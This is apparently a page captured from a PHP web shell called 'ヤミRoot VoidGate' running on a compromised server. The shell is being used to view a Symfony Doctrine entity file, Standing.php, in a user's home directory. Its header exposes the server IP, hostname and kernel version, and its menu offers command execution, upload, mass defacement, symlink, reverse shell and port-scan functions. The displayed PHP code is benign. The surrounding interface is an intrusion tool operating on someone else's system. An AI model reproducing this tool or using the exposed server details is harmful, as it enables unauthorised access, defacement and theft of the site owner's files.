ヤミRoot VoidGate
User / IP
:
216.73.216.143
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
itrave
/
api
/
src
/
AppBundle
/
Entity
/
Viewing: Standing.php
<?php namespace AppBundle\Entity; use Doctrine\ORM\Mapping as ORM; use JMS\Serializer\Annotation as Serializer; use Symfony\Bridge\Doctrine\Validator\Constraints\UniqueEntity; /** * Standing * * @ORM\Table(name="standing") * @ORM\Entity(repositoryClass="AppBundle\Repository\StandingRepository") * * @UniqueEntity("name") */ class Standing { /** * @var int * * @ORM\Column(name="id", type="integer") * @ORM\Id * @ORM\GeneratedValue(strategy="AUTO") * @Serializer\Groups({"LIST", "STANDING_DETAILS"}) */ private $standingId; /** * @var string * * @ORM\Column(name="name", type="string", length=45, nullable=true) * @Serializer\Groups({"LIST", "STANDING_DETAILS"}) */ private $name; /** * @var bool * * @ORM\Column(name="clim", type="boolean", nullable=true) * @Serializer\Groups({"STANDING_DETAILS"}) */ private $clim; /** * @var bool * * @ORM\Column(name="toilet", type="boolean", nullable=true) * @Serializer\Groups({"STANDING_DETAILS"}) */ private $toilet; /** * @var bool * * @ORM\Column(name="food", type="boolean", nullable=true) * @Serializer\Groups({"STANDING_DETAILS"}) */ private $food; /** * @var bool * * @ORM\Column(name="active", type="boolean") * @Serializer\Groups({"STANDING_DETAILS"}) */ private $active = true ; /** * @var \AppBundle\Entity\Company * * @ORM\ManyToOne(targetEntity="AppBundle\Entity\Company") * @ORM\JoinColumn(nullable=true) * @Serializer\Groups({"STANDING_DETAILS"}) * @Serializer\MaxDepth(1) */ private $company; /** * Get id * * @return int */ public function getStandingId() { return $this->standingId; } /** * Set name * * @param string $name * * @return Standing */ public function setName($name) { $this->name = $name; return $this; } /** * Get name * * @return string */ public function getName() { return $this->name; } /** * Set clim * * @param boolean $clim * * @return Standing */ public function setClim($clim) { $this->clim = $clim; return $this; } /** * Get clim * * @return bool */ public function getClim() { return $this->clim; } /** * Set toilet * * @param boolean $toilet * * @return Standing */ public function setToilet($toilet) { $this->toilet = $toilet; return $this; } /** * Get toilet * * @return bool */ public function getToilet() { return $this->toilet; } /** * Set food * * @param boolean $food * * @return Standing */ public function setFood($food) { $this->food = $food; return $this; } /** * Get food * * @return bool */ public function getFood() { return $this->food; } /** * Set company * * @param \AppBundle\Entity\Company $company * * @return Standing */ public function setCompany(\AppBundle\Entity\Company $company) { $this->company = $company; return $this; } /** * Get company * * @return \AppBundle\Entity\Company */ public function getCompany() { return $this->company; } /** * Set active * * @param boolean $active * * @return Standing */ public function setActive($active) { $this->active = $active; return $this; } /** * Get active * * @return boolean */ public function getActive() { return $this->active; } }
Coded With 💗 by
0x6ick